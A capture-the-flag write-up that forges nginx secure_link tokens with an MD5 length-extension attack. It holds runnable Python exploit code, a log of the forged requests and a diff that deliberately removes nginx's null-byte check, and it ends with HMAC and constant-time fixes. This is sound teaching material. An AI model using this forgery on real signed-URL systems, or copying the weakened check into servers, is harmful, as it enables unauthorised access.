Nginx Crypto Challenge's Solution


Overall Idea

This exercise mainly illustrates length-extension attacks and input collisions on Merkle-Damgård hash functions. For more details on this type of attack, see the advisory flickr_api_signature_forgery.pdf by Thai Duong and Juliano Rizzo, along with the documents listed in its bibliography.

In this case, the main idea is to mount a length-extension attack by exploiting the fact that the secret is the first element hashed. The attacker can therefore operate on two elements: the URI and the timestamp (expiration date). The first possibility is to leave the URI as it is and only modify the timestamp by appending a new timestamp to it. While the resulting value could overflow and might somehow be controlled, the padding rules this idea out: the two timestamps would not really be juxtaposed, they would be separated by non-numeric padding bytes, which are invalid in the context of the ngx_atotm() function. The second possibility is to modify both fields: the URI becomes the concatenation of the non-secret fields hashed in the original request (URI and timestamp) followed by the original padding bytes, and the timestamp is assigned a newly chosen value. In this case the new fields would be:

uri   : /p/eve/restricted.txt1295613171padding
expire: 1658275195  # Year 2022

Therefore the password concatenated with the new URI covers all the data previously hashed together with the correct padding, and hashing the new expiration date is simply an update of the original hash state. However, modifying the URI is not straightforward because it changes the requested resource, which may then no longer correspond to a valid resource on the server. In this case, the following rewrite rule makes the target resource static: every request is redirected to the file restricted.txt as long as it is correctly authenticated.

rewrite ^ /p/restricted.txt break;
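
To make the weakness concrete, here is a minimal Python 3 sketch of the token construction described above: the MD5 of the secret, the URI and the expiration timestamp concatenated in that order, encoded as unpadded URL-safe base64. The function name secure_link_token() and the placeholder secret are illustrative assumptions; this mirrors the description in this write-up, not the actual Nginx code.

```python
import base64
import hashlib


def secure_link_token(secret, uri, expire):
    """Return the unpadded URL-safe base64 of MD5(secret || uri || expire).

    Hypothetical helper mirroring the construction described in the text.
    """
    digest = hashlib.md5(secret + uri + expire).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


# The secret is hashed first, so anyone holding a valid token also holds the
# MD5 state reached after secret || uri || expire || padding.
token = secure_link_token(b"not-the-real-secret", b"/p/eve/restricted.txt", b"1295613171")
print(token)
```

Because the digest is exactly the internal state of MD5 after the padded input, publishing it lets an attacker resume hashing from that point.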

Building Blocks

The snippets of source code below are extracted from challenge.py, which itself uses md5.py, a Python implementation of MD5 copied from the PyPy project.

The main function md5_extend() takes as arguments the target host http://cc.dbzteam.org:9000, the original URI /p/eve/restricted.txt, the original secret hash aSYSRnsL0by4M1l1tbPcrQ and the timestamp 1295613171 for which that hash was generated. It tries to generate a new valid request with a newly chosen expiration date, without any knowledge of the server's secret. Because it does not know the length of the password, it has to generate different padding blocks until the one matching the actual password length produces a valid request. This code tests password lengths between 1 and 31 bytes. As soon as a request succeeds, i.e. the server answers with a 200 response code, it reads and returns the content of the file.

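import base64
import urllib

import md5  # local md5.py copied from PyPy


def md5_extend(host, uri, base_hash, expire):
    new_expire = '1658275195'  # 2022
    base_new_uri = uri + expire
    base_new_uri_len = len(base_new_uri)
    # Raw 16-byte digest recovered from the base64 token.
    hash_raw = md5_b64decode(base_hash)
    # i is the guessed length of the secret, in bytes.
    for i in range(1, 32):
        padding = md5_padding(i + base_new_uri_len)
        new_uri = base_new_uri + padding
        req = host + urllib.quote(new_uri)
        extension = md5.MD5Type()
        # Bytes already hashed: secret + uri + expire + padding (a multiple
        # of 64, which is 128 rather than 64 for the longest guesses).
        md5_set_state(extension, hash_raw, i + base_new_uri_len + len(padding))
        extension.update(new_expire)
        req += '?st=' + base64.urlsafe_b64encode(extension.digest()).strip('=')
        req += '&e=' + new_expire
        #print req
        urlobj = urllib.urlopen(req)
        if urlobj.getcode() == 200:
            return urlobj.read()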
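
The helper md5_b64decode() is called by md5_extend() but is not reproduced in this write-up. A plausible Python 3 sketch, assuming it only restores the stripped '=' characters and decodes the URL-safe base64 token, could look like this (the body is an assumption, not the code from challenge.py):

```python
import base64


def md5_b64decode(token):
    """Decode an unpadded URL-safe base64 token into raw digest bytes."""
    # base64 needs a length that is a multiple of 4, so put back the '='
    # characters that were stripped from the token.
    padded = token + "=" * (-len(token) % 4)
    return base64.urlsafe_b64decode(padded)


raw = md5_b64decode("aSYSRnsL0by4M1l1tbPcrQ")
print(len(raw))  # 16, the size of an MD5 digest
```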

To build new requests, Eve must append new data after the original data. The purpose of md5_set_state() is therefore to recreate the final MD5 internal state from a previously returned MD5 hash value. It does so by assigning the four variables A, B, C, D and by setting the current length to the estimated value data_len, which is a multiple of 64. After this call, the caller can hash additional input simply by calling md5.update(new_appended_data), which eventually results in a hash of:

original_hashed_data || pad1 || new_appended_data || pad2 = rr43nn-gMTS_paYH/p/eve/restricted.txt1295613171 || pad1 || 1658275195 || pad2

Here 1658275195 is the new expiration date chosen by Eve. Notice that the secret key is needed neither to recreate this state nor to update it with new data. All that is needed is the previous hash value and the size of the hashed data.

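import struct


def md5_set_state(md5obj, state, data_len):
    # The 16-byte digest is the little-endian encoding of the words A, B, C, D.
    A, B, C, D = struct.unpack("<IIII", state)
    md5obj.A = A
    md5obj.B = B
    md5obj.C = C
    md5obj.D = D
    # Number of bits already hashed (secret + uri + expire + padding).
    md5obj.count[0] = data_len << 3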
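
The claim that only the previous hash and the input length are needed can be checked offline. The following Python 3 sketch resumes MD5 from a digest using a compact compression function written for this illustration (it is not PyPy's md5.py, and the names compress(), md5_pad() and extend() are hypothetical). The secret appears only to compute the reference value with hashlib.

```python
import hashlib
import math
import struct

# Per-round shift amounts and additive constants from the MD5 specification.
SHIFTS = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
CONSTS = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]


def rotl(x, n):
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def compress(state, block):
    """Apply the MD5 compression function to one 64-byte block."""
    a, b, c, d = state
    words = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + CONSTS[i] + words[g]) & 0xFFFFFFFF
        a, d, c, b = d, c, b, (b + rotl(f, SHIFTS[i])) & 0xFFFFFFFF
    return tuple((x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d)))


def md5_pad(n):
    """Return the MD5 padding for a message of n bytes."""
    return b"\x80" + b"\x00" * ((55 - n) % 64) + struct.pack("<Q", n * 8)


def extend(digest, hashed_len, suffix):
    """Forge MD5(original || pad1 || suffix) from MD5(original) and its length."""
    state = struct.unpack("<4I", digest)                 # A, B, C, D
    resumed_len = hashed_len + len(md5_pad(hashed_len))  # multiple of 64
    tail = suffix + md5_pad(resumed_len + len(suffix))   # suffix || pad2
    for off in range(0, len(tail), 64):
        state = compress(state, tail[off:off + 64])
    return struct.pack("<4I", *state)


secret = b"rr43nn-gMTS_paYH"  # used only to compute the reference value
known = b"/p/eve/restricted.txt1295613171"
original = hashlib.md5(secret + known).digest()

forged = extend(original, len(secret) + len(known), b"1658275195")
genuine = hashlib.md5(secret + known + md5_pad(len(secret + known)) + b"1658275195").digest()
print(forged == genuine)
```

extend() never receives the secret itself, only its length, which is exactly the quantity the attack has to guess.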

The function md5_padding() recreates the padding that was appended to the original hashed fields key || uri || timestamp = rr43nn-gMTS_paYH/p/eve/restricted.txt1295613171 to round the input data up to a multiple of the block size, i.e. 64 bytes, before hashing. The exact length data_len of the input (without the padding) is required because its value in bits must be appended at the end of the last input block, just after the padding bytes. With the exception of the first byte (\x80), all padding bytes are null bytes \x00. The function returns the padding followed by the encoded length.

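def md5_padding(data_len):
    # Offset of the end of the input within its 64-byte block.
    index = data_len & 0x3f
    # Pad up to byte 56 of the block, spilling into a second block if needed.
    if index < 56:
        pad_len = 56 - index
    else:
        pad_len = 120 - index
    padding = '\x80' + '\x00' * 63
    # Input length in bits, as a 64-bit little-endian integer.
    bits = ''.join([chr(((data_len << 3) >> (i * 8)) & 0xff) for i in range(8)])
    return padding[:pad_len] + bits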
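
As a quick check of this layout, here is a Python 3 sketch of the same padding rule operating on bytes, applied to the real input size: a 16-byte key, the 21-byte URI and the 10-byte timestamp, i.e. 47 bytes. It is a port written for illustration, not the code from challenge.py.

```python
import struct
from urllib.parse import quote


def md5_padding(data_len):
    """Return the MD5 padding for data_len bytes of input, as bytes."""
    index = data_len & 0x3F  # bytes already used in the last block
    pad_len = (56 - index) if index < 56 else (120 - index)
    bit_length = struct.pack("<Q", data_len << 3)  # 64-bit little-endian bit count
    return b"\x80" + b"\x00" * (pad_len - 1) + bit_length


padding = md5_padding(47)
print(quote(padding))
```

The percent-encoded result is the suffix that follows the timestamp in the last request of the server log shown in "Putting it all together": 47 bytes are 376 bits, i.e. 0x178, stored as the bytes x (0x78) and %01.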

Server's modification

What separates this toy server from the real Nginx implementation is that it tolerates null bytes (%00), which come from the MD5 padding, in the URI. This is not standard: a good server implementation must reject them, which is precisely what Nginx does and what was artificially changed to make this challenge work. The modified source file is ngx_http_parse.c, see ngx_http_parse.c.diff. This is the only modification made to the server.

--- ngx_http_parse.c.orig	2011-01-25 05:11:18.157809998 +0100
+++ ngx_http_parse.c	2011-01-25 05:11:35.225810002 +0100
@@ -1247,9 +1247,7 @@
                     ch = *p++;
                     break;

-                } else if (ch == '\0') {
-                    return NGX_HTTP_PARSE_INVALID_REQUEST;
-                  }
+                }

                 state = quoted_state;
                 break;

Putting it all together

Eve executes challenge.py with the original valid MD5 hash and the original timestamp value as arguments. The script stops as soon as it receives a 200 response from the server.

python challenge.py aSYSRnsL0by4M1l1tbPcrQ 1295613171

The following lines are a sample of the requests handled by the server. Each request corresponds to a guess of the password's length, and the last one is the right one.

"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%00%00P%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00%00%60%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00%00h%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00%00p%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 403
"GET /p/eve/restricted.txt1295613171%80%00%00%00%00%00%00%00%00x%01%00%00%00%00%00%00?st=laULxGqve-HpudB615N5Nw&e=1658275195 HTTP/1.0" 200
	

With this last request, in which she guessed the length correctly and thus issued a valid request, Eve accessed the restricted file and was able to read it. It contains the number:

42

Wrapping up, security issues

  • The secure link module would be stronger if it used a real HMAC rather than a custom hash construction.
  • Another issue is the potential lack of entropy of the password/passphrase used to set up the module. It would be worth deriving a key from the password and a salt with a password-based key derivation function such as PBKDF2 or scrypt.
  • An unrelated issue is the non-constant-time hash comparison in ngx_http_secure_link_module.c. It may enable an attacker who only knows a valid URI to guess the secret hash value associated with a chosen expiration date; see Nate Lawson's extensive work on the subject. The comparison is:
        ngx_md5_init(&md5);
        ngx_md5_update(&md5, val.data, val.len);
        ngx_md5_final(md5_buf, &md5);
    
        if (ngx_memcmp(hash_buf, md5_buf, 16) != 0) {
            goto not_found;
        }
    
    With ngx_memcmp() defined in ngx_string.h as:
    #define ngx_memcmp(s1, s2, n)  memcmp((const char *) s1, (const char *) s2, n)
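
The three points above can be sketched together in Python 3 with the standard hmac and hashlib modules. This is only an illustration of the recommendations, not a patch for the Nginx module: the function names, the field separator, the salt and the iteration count are all placeholder assumptions.

```python
import hashlib
import hmac


def sign(key, uri, expire):
    """Return an HMAC-SHA256 tag over the URI and expiration timestamp."""
    # The separator marks the boundary between the two fields
    # (expire is assumed to hold digits only).
    return hmac.new(key, uri + b"|" + expire, hashlib.sha256).digest()


def verify(key, uri, expire, tag):
    """Compare the expected and received tags without an early exit."""
    return hmac.compare_digest(sign(key, uri, expire), tag)


# Derive the key from a passphrase; salt and iteration count are placeholders.
key = hashlib.pbkdf2_hmac("sha256", b"passphrase", b"per-site-salt", 100000)
tag = sign(key, b"/p/eve/restricted.txt", b"1295613171")

print(verify(key, b"/p/eve/restricted.txt", b"1295613171", tag))  # True
print(verify(key, b"/p/eve/restricted.txt", b"1658275195", tag))  # False
```

HMAC is not subject to length extension because the key is mixed in again in an outer hash, and hmac.compare_digest() avoids the data-dependent early exit of memcmp().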